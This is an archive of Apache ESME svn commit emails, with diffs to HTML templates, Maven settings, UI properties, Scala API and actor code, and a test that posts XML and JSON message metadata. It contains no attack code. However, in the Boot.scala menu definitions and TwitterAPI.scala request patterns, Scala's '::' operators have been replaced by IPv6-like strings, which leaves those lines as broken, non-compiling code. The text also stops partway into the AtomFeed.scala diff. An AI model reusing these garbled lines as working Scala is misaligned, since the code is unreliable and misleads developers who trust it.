From [email protected] Sun Oct 10 12:36:47 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 12799 invoked from network); 10 Oct 2010 12:36:47 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 10 Oct 2010 12:36:47 -0000 Received: (qmail 49957 invoked by uid 500); 10 Oct 2010 12:36:47 -0000 Delivered-To: [email protected] Received: (qmail 49930 invoked by uid 500); 10 Oct 2010 12:36:46 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <esme-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 49922 invoked by uid 99); 10 Oct 2010 12:36:45 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 10 Oct 2010 12:36:45 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED,WEIRD_QUOTING X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 10 Oct 2010 12:36:44 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id F269D23889EA; Sun, 10 Oct 2010 12:36:23 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1006282 [2/2] - in /incubator/esme/branches/tagandconversationfollow: ./ src/main/resources/ src/main/resources/props/ src/main/scala/bootstrap/liftweb/ src/main/scala/org/apache/esme/actor/ src/main/scala/org/apache/esme/api/ src/main/sca... Date: Sun, 10 Oct 2010 12:36:23 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Modified: incubator/esme/branches/tagandconversationfollow/src/main/webapp/templates-hidden/message.html URL: http://svn.apache.org/viewvc/incubator/esme/branches/tagandconversationfollow/src/main/webapp/templates-hidden/message.html?rev=1006282&r1=1006281&r2=1006282&view=diff ============================================================================== --- incubator/esme/branches/tagandconversationfollow/src/main/webapp/templates-hidden/message.html (original) +++ incubator/esme/branches/tagandconversationfollow/src/main/webapp/templates-hidden/message.html Sun Oct 10 12:36:21 2010 @@ -24,8 +24,7 @@ <script src="scripts/display_messages_top.js" type="text/javascript"/> <script src="scripts/pretty.js" type="text/javascript"/> </head> - - <div id="left"> + <div id="left"> <div id="back-header"> <!---UPDATE BOX --> <div class="container-update"> @@ -76,7 +75,8 @@ var rep_msg = text if (text.length > 50) rep_msg = text.substr(0, 47) + "..." - jQuery('#reply-to-span').html(rep_msg); + jQuery('#reply-to-span').html(rep_msg); + jQuery('#vMsg').val("@" + author + " ") jQuery('#vMsg').focus() jQuery('#vPool').val(msgPool); } @@ -103,36 +103,39 @@ <!--updates-box --> <lift:comet type="Timeline"/> <div id="personal_timeline_messages"> + <div class="updates-box" id="message"> <div class="avatar"> - <img id="avatar" width="50px"/> - </div> - <div class="update"> - <div id="body"></div> - <div class="info"> - <a href="" id="author"></a> - <div class="time"> - <div id="supp_data"></div> - </div> - </div> - </div> - <div class="time"> </div> - <div id="msgPool" style="display: none"> </div> - <div class="actions"> - <a href="#" id="resend"> - <lift:loc>ui_messages_message_label_resend</lift:loc> - </a> - <span id="resend">| </span> - <a href="#" id="reply"> - <lift:loc>ui_messages_message_label_reply</lift:loc> - </a> - <span id="conversation">| </span> - <a id="conversation"> - <lift:loc>ui_messages_message_label_conversation</lift:loc> - </a> - </div> - <div class="separator"> </div> - </div> - </div> + <img id="avatar" width="40px"/> + </div> <!--end avatar--> + <div class="update2"> + + <div class="info2"> + <a href="" id="author"/> + <div id="msgbody"/> + <div class="supp_data_class" id="supp_data"/> + </div> <!--end info2--> + + + <div class="actions"> + <a href="#" id="resend"> + <lift:loc>ui_messages_message_label_resend</lift:loc> + </a> + <span id="resend">| </span> + <a href="#" id="reply"> + <lift:loc>ui_messages_message_label_reply</lift:loc> + </a> + <span id="conversation">| </span> + <a id="conversation"> + <lift:loc>ui_messages_message_label_conversation</lift:loc> + </a> + </div> <!--end actions--> + <div id="msgsep" class="separator"></div> <!-- separator works here but is too short--> + </div> <!--end update2--> + + </div> <!--end updates-box--> + <!-- <div id="msgsep" class="separator"/> seprator should be here but doesn't work--> + + </div> </div> </lift:surround> \ No newline at end of file Modified: incubator/esme/branches/tagandconversationfollow/src/main/webapp/templates-hidden/message_core.html URL: http://svn.apache.org/viewvc/incubator/esme/branches/tagandconversationfollow/src/main/webapp/templates-hidden/message_core.html?rev=1006282&r1=1006281&r2=1006282&view=diff ============================================================================== --- incubator/esme/branches/tagandconversationfollow/src/main/webapp/templates-hidden/message_core.html (original) +++ incubator/esme/branches/tagandconversationfollow/src/main/webapp/templates-hidden/message_core.html Sun Oct 10 12:36:21 2010 @@ -18,26 +18,31 @@ --> <div id="timeline_messages"> -<head> - <script src="../scripts/display_messages.js" type="text/javascript"/> - <script src="../scripts/pretty.js" type="text/javascript"/> -</head> - <div class="updates-box" id="message"> - <div class="avatar"> - <img id="avatar" width="50px"/> - </div> - <div class="update"> - <div id="body"></div> - <div class="info"> - <a href="" id="author"></a> - <div class="time"> - <div id="supp_data"></div> - </div> - </div> - </div> - <div class="time"> </div> - <div class="separator"> </div> - </div> -</div> + <head> + <script src="../scripts/display_messages_top.js" type="text/javascript" /> + <script src="../scripts/pretty.js" type="text/javascript" /> + </head> + <div class="updates-box" id="message"> + <div class="avatar"> + <img id="avatar" width="40px" /> + </div> + <!--end avatar--> + <div class="update2"> + <div class="info2"> + <a href="" id="author" /> + <div id="msgbody" /> + <div class="supp_data_class" id="supp_data" /> + </div> + <!--end info2--> + <div class="actions"></div> + <!--end actions--> + <div id="msgsep" class="separator"></div> + <!-- separator works here but is too short--> + </div> + <!--end update2--> + </div> + <!--end updates-box--> + <!-- <div id="msgsep" class="separator"/> seprator should be here but doesn't work--> +</div> Modified: incubator/esme/branches/tagandconversationfollow/src/test/scala/org/apache/esme/api/API2Test.scala URL: http://svn.apache.org/viewvc/incubator/esme/branches/tagandconversationfollow/src/test/scala/org/apache/esme/api/API2Test.scala?rev=1006282&r1=1006281&r2=1006282&view=diff ============================================================================== --- incubator/esme/branches/tagandconversationfollow/src/test/scala/org/apache/esme/api/API2Test.scala (original) +++ incubator/esme/branches/tagandconversationfollow/src/test/scala/org/apache/esme/api/API2Test.scala Sun Oct 10 12:36:21 2010 @@ -370,6 +370,32 @@ object Api2Specs extends Specification w for (session_res <- post("user/messages", "message" -> "test message")) { session_res.code must be equalTo 403 } + } + + "with XML metadata" in { + for{ + session <- post_session + mess_res <- session.post("user/messages", + "message" -> "test POST message", + "metadata" -> """<outer><meta><metameta>"Hello"</metameta></meta><onlymeta>Meta</onlymeta></outer>""") + } { + mess_res.code must be equalTo 200 + (mess_res.xml.open_! \ "message") must \\ (<body>test POST message</body>) + (mess_res.xml.open_! \\ "metadata").toString must be equalTo """<metadata><outer><meta><metameta>&quot;Hello&quot;</metameta></meta><onlymeta>Meta</onlymeta></outer></metadata>""" + } + } + + "with JSON metadata" in { + for{ + session <- post_session + mess_res <- session.post("user/messages", + "message" -> "test POST message", + "metadata" -> """"meta":[{"place":{"place_type":"city","region":"CA+"}},{"song":{"artist":"Prince","songtitle":"Never+Let+Me+Down"}}]""") + } { + mess_res.code must be equalTo 200 + (mess_res.xml.open_! \ "message") must \\ (<body>test POST message</body>) + (mess_res.xml.open_! \\ "metadata").text must be equalTo """"meta":[{"place":{"place_type":"city","region":"CA+"}},{"song":{"artist":"Prince","songtitle":"Never+Let+Me+Down"}}]""" + } } } From [email protected] Sun Oct 10 12:36:55 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 12841 invoked from network); 10 Oct 2010 12:36:55 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 10 Oct 2010 12:36:55 -0000 Received: (qmail 50028 invoked by uid 500); 10 Oct 2010 12:36:55 -0000 Delivered-To: [email protected] Received: (qmail 49992 invoked by uid 500); 10 Oct 2010 12:36:55 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <esme-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 49984 invoked by uid 99); 10 Oct 2010 12:36:55 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 10 Oct 2010 12:36:55 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 10 Oct 2010 12:36:46 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id EE80D238890A; Sun, 10 Oct 2010 12:36:23 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1006282 [1/2] - in /incubator/esme/branches/tagandconversationfollow: ./ src/main/resources/ src/main/resources/props/ src/main/scala/bootstrap/liftweb/ src/main/scala/org/apache/esme/actor/ src/main/scala/org/apache/esme/api/ src/main/sca... Date: Sun, 10 Oct 2010 12:36:23 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: esjewett Date: Sun Oct 10 12:36:21 2010 New Revision: 1006282 URL: http://svn.apache.org/viewvc?rev=1006282&view=rev Log: Merged trunk into branch in preparation for merging the branch into trunk. That makes sense... Added: incubator/esme/branches/tagandconversationfollow/src/main/resources/props/compass.mysql.jdbc.cfg.xml - copied unchanged from r1006280, incubator/esme/trunk/server/src/main/resources/props/compass.mysql.jdbc.cfg.xml incubator/esme/branches/tagandconversationfollow/src/main/webapp/images/edit.gif - copied unchanged from r1006280, incubator/esme/trunk/server/src/main/webapp/images/edit.gif incubator/esme/branches/tagandconversationfollow/src/test/scala/org/apache/esme/api/TwitterAPITest.scala - copied unchanged from r1006280, incubator/esme/trunk/server/src/test/scala/org/apache/esme/api/TwitterAPITest.scala Removed: incubator/esme/branches/tagandconversationfollow/src/main/webapp/templates-hidden/public.html Modified: incubator/esme/branches/tagandconversationfollow/ (props changed) incubator/esme/branches/tagandconversationfollow/pom.xml incubator/esme/branches/tagandconversationfollow/src/main/resources/ESMEUI.properties incubator/esme/branches/tagandconversationfollow/src/main/resources/props/compass.filesystem.cfg.xml (props changed) incubator/esme/branches/tagandconversationfollow/src/main/resources/props/compass.jdbc.cfg.xml incubator/esme/branches/tagandconversationfollow/src/main/scala/bootstrap/liftweb/Boot.scala incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/actor/Distributor.scala incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/actor/UserActor.scala incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/api/API2.scala incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/api/TwitterAPI.scala incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/api/XMLHelper.scala incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/external/AtomFeed.scala incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/external/Feed.scala incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/external/RssFeed.scala incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/lib/AccessPoolMgr.scala incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/lib/StreamMgr.scala incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/liftwebext/SHtml.scala incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/model/AccessPool.scala incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/model/Action.scala incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/model/Message.scala incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/model/Privilege.scala incubator/esme/branches/tagandconversationfollow/src/main/webapp/index.html incubator/esme/branches/tagandconversationfollow/src/main/webapp/info_view/public.html incubator/esme/branches/tagandconversationfollow/src/main/webapp/info_view/search.html incubator/esme/branches/tagandconversationfollow/src/main/webapp/info_view/streams.html incubator/esme/branches/tagandconversationfollow/src/main/webapp/pools_view/index.html incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/dialog_action.js incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/dialog_pool.js incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/dialog_token.js incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/dialog_track.js incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/display_messages.js incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/display_messages_top.js incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/display_single_message.js incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/esme_streams.js incubator/esme/branches/tagandconversationfollow/src/main/webapp/scripts/pretty.js incubator/esme/branches/tagandconversationfollow/src/main/webapp/style/style.css incubator/esme/branches/tagandconversationfollow/src/main/webapp/templates-hidden/base.html incubator/esme/branches/tagandconversationfollow/src/main/webapp/templates-hidden/base_top.html incubator/esme/branches/tagandconversationfollow/src/main/webapp/templates-hidden/default.html incubator/esme/branches/tagandconversationfollow/src/main/webapp/templates-hidden/message.html incubator/esme/branches/tagandconversationfollow/src/main/webapp/templates-hidden/message_core.html incubator/esme/branches/tagandconversationfollow/src/test/scala/org/apache/esme/api/API2Test.scala Propchange: incubator/esme/branches/tagandconversationfollow/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Sun Oct 10 12:36:21 2010 @@ -1,2 +1,4 @@ /incubator/esme/branches/lift-2.0/server:928728-939625 +/incubator/esme/branches/metadata:966215-979767 /incubator/esme/branches/ui-2010-03-05:919339-923098 +/incubator/esme/trunk/server:966215-1006280 Modified: incubator/esme/branches/tagandconversationfollow/pom.xml URL: http://svn.apache.org/viewvc/incubator/esme/branches/tagandconversationfollow/pom.xml?rev=1006282&r1=1006281&r2=1006282&view=diff ============================================================================== --- incubator/esme/branches/tagandconversationfollow/pom.xml (original) +++ incubator/esme/branches/tagandconversationfollow/pom.xml Sun Oct 10 12:36:21 2010 @@ -22,7 +22,7 @@ <modelVersion>4.0.0</modelVersion> <groupId>org.apache.esme</groupId> <artifactId>esme-server</artifactId> - <version>apache-esme-1.0-RC1-incubating</version> + <version>apache-esme-1.1-incubating</version> <packaging>war</packaging> <name>Apache Enterprise Social Messaging Experiment (ESME)</name> <url>http://incubator.apache.org/esme</url> @@ -75,7 +75,7 @@ </developer> </developers> <properties> - <lift.version>2.0-SNAPSHOT</lift.version> + <lift.version>2.0</lift.version> <scala.version>2.7.7</scala.version> <compass.version>2.1.1</compass.version> <lucene.version>2.4.0</lucene.version> @@ -177,6 +177,7 @@ <groupId>net.liftweb</groupId> <artifactId>lift-testkit</artifactId> <version>${lift.version}</version> + <scope>test</scope> </dependency> <dependency> <groupId>net.liftweb</groupId> @@ -225,7 +226,7 @@ <scope>test</scope> </dependency> <dependency> - <groupId>org.mortbay.jetty</groupId> + <groupId>org.mortbay.jetty</groupId> <artifactId>jetty</artifactId> <version>[6.1.6,)</version> <scope>test</scope> @@ -242,11 +243,21 @@ <artifactId>lucene-snowball</artifactId> <version>${lucene.version}</version> </dependency> - <!--dependency> - <groupId>com.twitter</groupId> - <artifactId>stats</artifactId> - <version>${scala.stats.version}</version> - </dependency--> + <dependency> + <groupId>log4j</groupId> + <artifactId>log4j</artifactId> + <version>1.2.14</version> + </dependency> + <dependency> + <groupId>org.slf4j</groupId> + <artifactId>slf4j-api</artifactId> + <version>1.5.11</version> + </dependency> + <dependency> + <groupId>net.lag</groupId> + <artifactId>configgy</artifactId> + <version>1.5.3</version> + </dependency> <dependency> <groupId>com.twitter</groupId> <artifactId>ostrich</artifactId> Modified: incubator/esme/branches/tagandconversationfollow/src/main/resources/ESMEUI.properties URL: http://svn.apache.org/viewvc/incubator/esme/branches/tagandconversationfollow/src/main/resources/ESMEUI.properties?rev=1006282&r1=1006281&r2=1006282&view=diff ============================================================================== --- incubator/esme/branches/tagandconversationfollow/src/main/resources/ESMEUI.properties (original) +++ incubator/esme/branches/tagandconversationfollow/src/main/resources/ESMEUI.properties Sun Oct 10 12:36:21 2010 @@ -42,8 +42,11 @@ ui_login_openid=Or Login using Open ID ui_login_email=Email ui_default_conversation=Conversation -ui_default_footer=Apache ESME 2009 - An Apache Incubator Project +ui_default_footer=Apache ESME 2010 - An Apache Incubator Project ui_default_title=Enterprise Social Messaging Experiment +ui_default_on_esme=Now on ESME +ui_default_pagetitle=ESME + ui_pool_manage=My Pools ui_pool_create=Create New Pool @@ -183,6 +186,10 @@ ui_tag_date=Date ui_streams_manage=Streams ui_public_title=Public +ui_pool_list_mine_title=All My Pools & Roles +ui_pool_list_mine_pool_name=Pool +ui_pool_list_mine_role=My Role + Propchange: incubator/esme/branches/tagandconversationfollow/src/main/resources/props/compass.filesystem.cfg.xml ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Sun Oct 10 12:36:21 2010 @@ -0,0 +1,2 @@ +/incubator/esme/branches/metadata/src/main/resources/props/compass.filesystem.cfg.xml:966215-979767 +/incubator/esme/trunk/server/src/main/resources/props/compass.filesystem.cfg.xml:966215-1006280 Modified: incubator/esme/branches/tagandconversationfollow/src/main/resources/props/compass.jdbc.cfg.xml URL: http://svn.apache.org/viewvc/incubator/esme/branches/tagandconversationfollow/src/main/resources/props/compass.jdbc.cfg.xml?rev=1006282&r1=1006281&r2=1006282&view=diff ============================================================================== --- incubator/esme/branches/tagandconversationfollow/src/main/resources/props/compass.jdbc.cfg.xml (original) +++ incubator/esme/branches/tagandconversationfollow/src/main/resources/props/compass.jdbc.cfg.xml Sun Oct 10 12:36:21 2010 @@ -25,11 +25,13 @@ <compass name="default"> <connection> - <jdbc> + <jdbc dialect= "org.apache.lucene.store.jdbc.dialect.DerbyDialect"> + <!-- For 'dialect' see http://www.compass-project.org/schema/compass-core-config-2.1.xsd --> <dataSourceProvider> - <driverManager url="jdbc:example" - username="user" password="password" - driverClass="com.example.jdbc.Driver" /> + <!-- Username must be present and password can be empty --> + <driverManager url="jdbc:derby:esme_compass_index_db;create=true" + username="esmeuser" password="" + driverClass="org.apache.derby.jdbc.EmbeddedDriver" /> </dataSourceProvider> </jdbc> Modified: incubator/esme/branches/tagandconversationfollow/src/main/scala/bootstrap/liftweb/Boot.scala URL: http://svn.apache.org/viewvc/incubator/esme/branches/tagandconversationfollow/src/main/scala/bootstrap/liftweb/Boot.scala?rev=1006282&r1=1006281&r2=1006282&view=diff ============================================================================== --- incubator/esme/branches/tagandconversationfollow/src/main/scala/bootstrap/liftweb/Boot.scala (original) +++ incubator/esme/branches/tagandconversationfollow/src/main/scala/bootstrap/liftweb/Boot.scala Sun Oct 10 12:36:21 2010 @@ -27,7 +27,7 @@ import net.liftweb.http.auth._ import net.liftweb.sitemap._ import net.liftweb.sitemap.Loc._ import Helpers._ -import TimeHelpers.intToTimeSpanBuilder +//import TimeHelpers.intToTimeSpanBuilder //import net.liftweb.mapper.{DB, ConnectionManager, Schemifier, DefaultConnectionIdentifier, ConnectionIdentifier} import java.sql.{Connection, DriverManager} import _root_.net.liftweb.mapper.{DB, ConnectionManager, Schemifier, DefaultConnectionIdentifier, StandardDBVendor} @@ -123,6 +123,12 @@ class Boot { object logLevel extends LogLevelChanger with Log4jLoggingBackend + LiftRules + .noticesAutoFadeOut + .default + .set(Vendor((noticeType:NoticeType.Value) => Full((3 seconds, 3 + seconds)))) + LiftRules.dispatch.append(ESMEOpenIDVendor.dispatchPF) //Resources for Internationalization @@ -158,16 +164,19 @@ class Boot { // Register Auth methods that are used in ESME UserAuth.register(UserPwdAuthModule) - UserAuth.register(OpenIDAuthModule) + UserAuth.register(OpenIDAuthModule) + + def ifIsLoggedIn = If(User.loggedIn_? _, strFuncToFailMsg(() => S.?("base_error_not_logged_in"))) // Build SiteMap val entries = Menu(Loc("Home", List("index"), "Home")) acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b - Menu(Loc("user", List("info_view", "user"), "User Info", Hidden, + Menu(Loc("user", List("info_view", "user"), "User Info", ifIsLoggedIn, Loc.Snippet("user_info", TagDisplay.userInfo))) acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b logLevel.menu acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b - Menu(Loc("tag", List("info_view", "tag"), "Tag", Hidden, Loc.Snippet("tag_display", TagDisplay.display))) acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b - Menu(Loc("public", List("info_view", "public"), S.?("base_profile_public"))) acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b - Menu(Loc("contacts", List("info_view", "contacts"), S.?("base_profile_contacts"))) acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b + Menu(Loc("tag", List("info_view", "tag"), "Tag", ifIsLoggedIn, + Loc.Snippet("tag_display", TagDisplay.display))) acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b + Menu(Loc("public", List("info_view", "public"), S.?("base_profile_public"), ifIsLoggedIn)) acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b + Menu(Loc("contacts", List("info_view", "contacts"), S.?("base_profile_contacts"), ifIsLoggedIn)) acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b Menu(Loc("sign_up", List("signup"), S.?("base_menu_signup"), Snippet("signup", User.signupForm), Unless(User.loggedIn_? _, S.?("base_menu_sign_up_error")))) acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b Modified: incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/actor/Distributor.scala URL: http://svn.apache.org/viewvc/incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/actor/Distributor.scala?rev=1006282&r1=1006281&r2=1006282&view=diff ============================================================================== --- incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/actor/Distributor.scala (original) +++ incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/actor/Distributor.scala Sun Oct 10 12:36:21 2010 @@ -33,7 +33,7 @@ import common._ import org.apache.esme._ import model._ -import scala.xml.{Elem} +import scala.xml.{Node, Elem} /** * The Distributor actor forwards messages to the appropriate user actor @@ -102,8 +102,8 @@ object Distributor extends LiftActor { } case class UserCreatedMessage(user: Long, text: String, tags: List[String], - when: Long, - metaData: Box[Elem], + when: Long, + metaData: Box[Node], source: String, replyTo: Box[Long], pool: Box[Long]) Modified: incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/actor/UserActor.scala URL: http://svn.apache.org/viewvc/incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/actor/UserActor.scala?rev=1006282&r1=1006281&r2=1006282&view=diff ============================================================================== --- incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/actor/UserActor.scala (original) +++ incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/actor/UserActor.scala Sun Oct 10 12:36:21 2010 @@ -31,15 +31,15 @@ import model._ import lib._ import java.util.{TimeZone, Calendar} -import scala.xml.{Elem} +import scala.xml.{Node, Elem} //import com.twitter.stats.Stats import com.twitter.ostrich.Stats object UserActor { private[actor] case class StartMeUp(user: Long) private[actor] case class RefreshMe(user: Long) - private[actor] case class CreateMessage(text: String, tags: List[String], - when: Long, metaData: Box[Elem], + private[actor] case class CreateMessage(text: String, tags: List[String], + when: Long, metaData: Box[Node], source: String, replyTo: Box[Long], pool: Box[Long]) Modified: incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/api/API2.scala URL: http://svn.apache.org/viewvc/incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/api/API2.scala?rev=1006282&r1=1006281&r2=1006282&view=diff ============================================================================== --- incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/api/API2.scala (original) +++ incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/api/API2.scala Sun Oct 10 12:36:21 2010 @@ -56,7 +56,7 @@ import org.apache.esme._ import model._ import org.apache.esme.actor._ -import scala.xml.{NodeSeq, Text, Elem, XML, Node} +import scala.xml._ import scala.collection.mutable.ListBuffer @@ -339,7 +339,10 @@ object API2 extends ApiHelper with XmlHe Tag.split(S.param("tags") openOr ""), millis, - xml, + xml match { + case Full(x) => xml + case _ => Box({new Atom(S.param("metadata") openOr "")}) + }, from, S.param("replyto").map(toLong), pool) match { Modified: incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/api/TwitterAPI.scala URL: http://svn.apache.org/viewvc/incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/api/TwitterAPI.scala?rev=1006282&r1=1006281&r2=1006282&view=diff ============================================================================== --- incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/api/TwitterAPI.scala (original) +++ incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/api/TwitterAPI.scala Sun Oct 10 12:36:21 2010 @@ -94,7 +94,11 @@ abstract class TwitterAPI { case Req(ApiPath acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b> "statuses" acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b> "retweeted_to_me", this.method, GetRequest) => () => timeline(ToMe) case Req(ApiPath acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b> "friendships" acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b> "create" acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b> last, this.method, PostRequest) => () => createFriendship(last) + case Req(ApiPath acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b> "friendships" acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b> "create", this.method, PostRequest) + if S.param("user_id").isDefined => createFriendship case Req(ApiPath acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b> "friendships" acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b> "destroy" acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b> last, this.method, PostRequest) => () => destroyFriendship(last) + case Req(ApiPath acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b> "friendships" acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b> "destroy", this.method, PostRequest) + if S.param("user_id").isDefined => destroyFriendship case Req(ApiPath acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b> "friendships" acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b> "exists", this.method, GetRequest) => existsFriendship case Req(ApiPath acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b> "account" acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b> "verify_credentials", this.method, GetRequest) => verifyCredentials @@ -236,7 +240,12 @@ abstract class TwitterAPI { source(req.param("source") openOr "twitterapi"). setTextAndTags(text, Nil, None)) yield { - Distributor ! Distributor.AddMessageToMailbox(user.id.is, msg.saveMe, NoReason) + Distributor ! Distributor.UserCreatedMessage(user.id.is, text, Nil, + millis, + None, + msg.source, + None, + None) Right(Map("status" -> msgData(msg))) } } @@ -286,6 +295,12 @@ abstract class TwitterAPI { } } + def createFriendship(): Box[TwitterResponse] = { + for (user_id <- S.param("user_id"); + response <- createFriendship(user_id)) + yield response + } + def destroyFriendship(other: String): Box[TwitterResponse] = { for (user <- calcUser; other <- User.findFromWeb(other) ?~ S.?("base_twitter_api_err_user_not_found")) @@ -296,6 +311,12 @@ abstract class TwitterAPI { Right(Map("hash" -> Map("error" -> S.?("base_twitter_api_err_user_not_unfollow")))) } } + + def destroyFriendship(): Box[TwitterResponse] = { + for (user_id <- S.param("user_id"); + response <- destroyFriendship(user_id)) + yield response + } def existsFriendship(): Box[TwitterResponse] = { for (req <- S.request; Modified: incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/api/XMLHelper.scala URL: http://svn.apache.org/viewvc/incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/api/XMLHelper.scala?rev=1006282&r1=1006281&r2=1006282&view=diff ============================================================================== --- incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/api/XMLHelper.scala (original) +++ incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/api/XMLHelper.scala Sun Oct 10 12:36:21 2010 @@ -35,7 +35,7 @@ import Helpers._ import org.apache.esme._ import model._ -import scala.xml.{NodeSeq, Text, Elem, UnprefixedAttribute, Null, Node} +import scala.xml.{NodeSeq, Text, Elem, UnprefixedAttribute, Null, Node, XML} trait XmlHelper { protected def userToXml(user: User): Elem = @@ -60,7 +60,9 @@ trait XmlHelper { <date>{toInternetDate(msg.when.is)}</date> <source>{msg.source.sourceAttr.getOrElse(Text(""))}</source> <body>{msg.body}</body> - <metadata>{msg.metadata}</metadata> + { if ( msg.metadata != null && msg.metadata.length != 0 ) + XML.loadString(msg.metadata) + else <metadata/> } { msg.author.obj.map(u => <author><nickname>{u.niceName}</nickname><id>{u.id.toString}</id></author> Modified: incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/external/AtomFeed.scala URL: http://svn.apache.org/viewvc/incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/external/AtomFeed.scala?rev=1006282&r1=1006281&r2=1006282&view=diff ============================================================================== --- incubator/esme/branches/tagandconversationfollow/src/main/scala/org/apache/esme/external/AtomFeed.scala (original) +++ 